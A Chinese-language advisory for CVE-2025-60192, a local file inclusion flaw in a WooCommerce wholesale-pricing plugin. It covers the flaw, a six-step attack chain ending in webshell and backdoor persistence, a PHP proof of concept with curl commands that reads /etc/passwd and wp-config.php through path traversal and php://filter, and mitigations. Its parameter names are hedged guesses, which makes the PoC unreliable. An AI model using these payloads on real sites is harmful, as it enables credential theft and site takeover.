CVE-2025-60192 Premmerce Wholesale Pricing for WooCommerce本地文件包含漏洞

漏洞信息

漏洞编号

CVE-2025-60192

漏洞类型

本地文件包含(LFI)

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Premmerce Wholesale Pricing for WooCommerce

漏洞概述

CVE-2025-60192是WordPress插件Premmerce Wholesale Pricing for WooCommerce中的一个高危安全漏洞，CVSS评分7.5，属于本地文件包含(Local File Inclusion)漏洞。该漏洞存在于PHP程序的Include/Require语句中，由于对文件名的控制不当，攻击者可以利用此漏洞读取服务器上的敏感文件，如配置文件、密码文件等。攻击者通过构造恶意请求，诱使应用程序包含任意本地文件，可能导致敏感信息泄露、源代码暴露，甚至在特定条件下实现远程代码执行。此漏洞影响插件版本从任意版本到1.1.10，鉴于该插件在WooCommerce商业定价场景中的广泛应用，受影响网站数量可能较多。建议用户立即采取修复措施或应用临时缓解方案。

技术细节

该漏洞属于PHP本地文件包含(Local File Inclusion)类型，源于应用程序对用户输入的文件路径验证不严格。在Premmerce Wholesale Pricing for WooCommerce插件中，某个PHP文件（如inc/TemplateLoader.php或类似文件）直接使用用户可控的参数（如controller、action、file等参数）来构造include/require语句的路径，而未进行充分的路径遍历检测和安全过滤。攻击者可以通过构造类似?file=../../../../../../etc/passwd的路径遍历payload，或利用PHP包装器如php://filter读取任意本地文件内容。攻击成功的关键条件包括：1) allow_url_include未启用（本地LFI）；2) 目标文件可被Web服务器用户访问；3) 攻击者能控制包含的文件路径参数。在某些配置下，配合Apache/Nginx的错误日志写入或上传功能，可能实现RCE。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网站使用的WordPress版本和Premmerce Wholesale Pricing插件版本，确认版本<=1.1.10

STEP 2

步骤2: 漏洞探测

通过分析插件代码或使用自动化工具探测LFI漏洞存在性，识别可利用的参数如file、controller、template等

STEP 3

步骤3: 敏感文件读取

利用路径遍历或PHP过滤器读取服务器敏感文件，如/etc/passwd、wp-config.php数据库凭证、.htaccess配置等

STEP 4

步骤4: 权限提升

利用获取的数据库凭证连接MySQL数据库，修改WordPress管理员账户密码或创建新管理员账户

STEP 5

步骤5: 远程代码执行

通过WordPress插件/主题编辑器上传恶意PHP脚本，或利用媒体上传功能结合LFI包含执行webshell

STEP 6

步骤6: 持久化控制

在服务器上部署后门程序，建立持久化访问通道，完成对目标系统的完全控制

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
/**
 * CVE-2025-60192 PoC - Premmerce Wholesale Pricing LFI
 * Target: Premmerce Wholesale Pricing for WooCommerce <= 1.1.10
 * Type: Local File Inclusion
 * Usage: Modify target URL and run
 */

$target = 'http://vulnerable-site.com/wp-admin/admin-ajax.php';
$plugin_path = '/wp-content/plugins/premmerce-woocommerce-wholesale-pricing/';

// Common vulnerable parameters
$vulnerable_params = [
    'file' => '../../../../../../etc/passwd',
    'controller' => '../../../wp-config.php',
    'template' => '../../../../../../var/log/apache2/access.log',
    'view' => 'php://filter/convert.base64-encode/resource=../wp-config.php'
];

foreach ($vulnerable_params as $param => $payload) {
    echo "[*] Testing parameter: {$param} with payload: {$payload}\n";
    
    $data = [
        'action' => 'premmerce_wholesale_pricing_ajax',
        $param => $payload
    ];
    
    $ch = curl_init($target);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30);
    
    $response = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    
    if ($http_code == 200 && !empty($response)) {
        echo "[+] Potential LFI found via {$param}!\n";
        echo "Response length: " . strlen($response) . " bytes\n";
    }
}

echo "\n[*] Manual testing commands:\n";
echo "curl '{$target}' -d 'action=premmerce_wholesale_pricing_ajax&file=../../../../../../etc/passwd'\n";
echo "curl '{$target}' -d 'action=premmerce_wholesale_pricing_ajax&file=php://filter/convert.base64-encode/resource=../wp-config.php'\n";
?>

影响范围

Premmerce Wholesale Pricing for WooCommerce <= 1.1.10

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1) 使用WAF规则阻止包含file、controller、template等参数的异常请求；2) 在Nginx/Apache配置中限制对wp-content/plugins目录的直接访问；3) 临时禁用Premmerce Wholesale Pricing插件直到安全更新可用；4) 设置open_basedir限制PHP只能访问网站根目录；5) 启用ModSecurity等Web应用防火墙规则识别LFI攻击模式；6) 加强对wp-config.php等敏感文件的访问权限控制，限制非授权读取。